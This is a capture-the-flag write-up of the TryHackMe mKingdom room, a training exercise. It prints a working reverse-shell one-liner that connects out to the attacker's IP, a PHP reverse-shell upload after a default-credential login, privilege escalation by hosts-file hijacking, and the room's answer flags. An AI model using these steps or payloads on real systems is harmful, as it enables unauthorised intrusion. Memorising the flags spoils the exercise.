mKingdom: TryHackMe Writeup
Introduction
TryHackMe is a popular platform for learning cybersecurity through hands-on challenges. In this post, I’ll guide you through my experience with the mkingdom room. This room involves exploiting a web server to gain root access. Follow along to see how I navigated each step and overcame the challenges.
Step 1: Initial Nmap Scan
The first step is to perform an Nmap scan to discover open ports and services on the target machine:
nmap -sV -sC 10.10.201.21
The scan reveals that port 85 is hosting a web page. Checking it out in a browser, we get a message:
No luck here! Moving on…
Step 2: Directory Bruteforcing with Gobuster
Next, we use Gobuster to find hidden directories on the web server.
Gobuster discovers a directory /app:
gobuster dir -u http://10.10.201.21:85 -w /usr/share/wordlists/dirb/common.txt
Visiting this link in a browser, we find a website using the Concrete5 CMS. At the bottom of the page, there is a login link:
Step 3: Logging In
After looking around through the website we find that it is using concrete5 cms and there is a login page link at the bottom of the page:
Trying a few basic login credentials we can find that username: admin and password: password works and we are in!!
Step 4: Exploiting File Upload Functionality
Navigate to System & Settings > Allowed File Types and add php as an allowed file type. This allows us to upload a PHP reverse shell.
Now visit php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub and save the file on you machine. Change the ip address and the port and set it to your own machine’s ip address in my case it is 10.6.74.42. I set the port as 4444.
$ip = ‘127.0.0.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS
Step 5: Gaining Shell Access
Next visit the Files tab on the right side of the web page and select upload files and upload the file that we just downloaded. Before visiting the URL to File start a netcat listener on port 4444 using the command:
nc -lvnp 4444
And as soon as you visit the file we get access to the machine:
Step 6: Stabilizing the Shell
Next try to stabilize netcat shell by running the following command (for more information you can check out: How to stabilise netcat shells using Python (inkyvoxel.com):
python -c 'import pty;pty.spawn("/bin/bash")' #This spawns a more feature rich Bash shellexport TERM=xterm #set the xterm terminal emulatorpress Ctrl + Z #to 'background' the netcat shellstty raw -echo; fg #press enter after this
Step 7: Enumeration and Finding Credentials
As I check out the home directory I get two users mario and toad, but cannot cd into either of those as it shows permission denied.
Therefore, navigate to /var/www/html/app/castle/application/config and find database.php containing database credentials:
Step 8: Switching to User Toad
Use the found credentials to switch to user toad:
su toad
Step 9: Lateral Movement to User Mario
“Enumerate environment variables to find base64 encoded PWD_token, decode it, and use the password to switch to user mario.”
Exploring all the directories i find nothing helpful, and so next step was to do lateral movement to user mario from toad and try to play with linux privilege escalation: Linux Privilege Escalation | HackTricks | HackTricks
I run the following commands:
echo $PATH #but nothing here(env || set) 2>/dev/null
And here we get a PWD_token which is encoded as base64. Decoding this I get the password as — ‘ikaTeNTANtES’, hopefully it is of the user mario.
Switch to user mario:
mario@mkingdom:/home$ cd mario
mario@mkingdom:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
mario@mkingdom:~$Step 10: Capturing the User Flag
Navigate to Mario’s home directory and find user.txt. Use the head command to view it, as cat command is not allowed:
Question:
What is user.txt?
Answer: thm{030a769febb1b3291da1375234b84283}
Step 11: Privilege Escalation to Root
Next I snoop around a bit with no luck of finding a way to escalate to root user.
So next try to upload pspy from the link: https://github.com/DominicBreuker/pspy?tab=readme-ov-file
Follow the steps below:
- Download the file pspy64 from the link given above onto your machine:
2. Start a server on your own machine using the command:
python -m http.server
3. Now wget the file from your own machine to mkingdom’s machine:
wget http://'YOUR_MACHINE_IP':8000/Desktop/pspy64 -O /tmp/pspy64
Next add execution permission before running the file as shown in the below image:
We get a lot of info but we are interested in the following:
Step 12: Domain Hijacking for Root Access
Here the command curl mkingdom.thm:85/app/castle/application/counter.sh has uid of 0 so if we can highjack the domain mkingdom.thm then we can get root privilege.
Now to get the root privileges we can highjack the domain mkingdom.thm and to do that we need to edit the /etc/hosts file and change the ip address of mkingdom.thm domain to you own machine ip address in my case it is 10.6.74.42:
Next, replicate the directory structure and place a malicious script:
So as shown in the image below create the same path (/app/castle/application/counter.sh) and same directory with the file counter.sh but the content of the file should be as given below:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.6.74.42/4444 0>&1
Next start a server at port 85 on you machine by following command:
and then start a netcat listener on port 4444 as shown below, and soon we will get the root access of the machine!!!
Step 13: Capturing the Root Flag
Now, we still don’t have the permission to use cat to view root.txt so instead use the head command to get the root flag:
Question:
What is root.txt?
Answer: thm{e8b2f52d88b9930503cc16ef48775df0}
Conclusion
This concludes the walkthrough for the mkingdom room on TryHackMe. Through various techniques such as directory bruteforcing, file upload exploitation, and privilege escalation, we were able to gain root access. This exercise highlights the importance of securing web applications and server configurations to prevent similar attacks. Happy hacking!
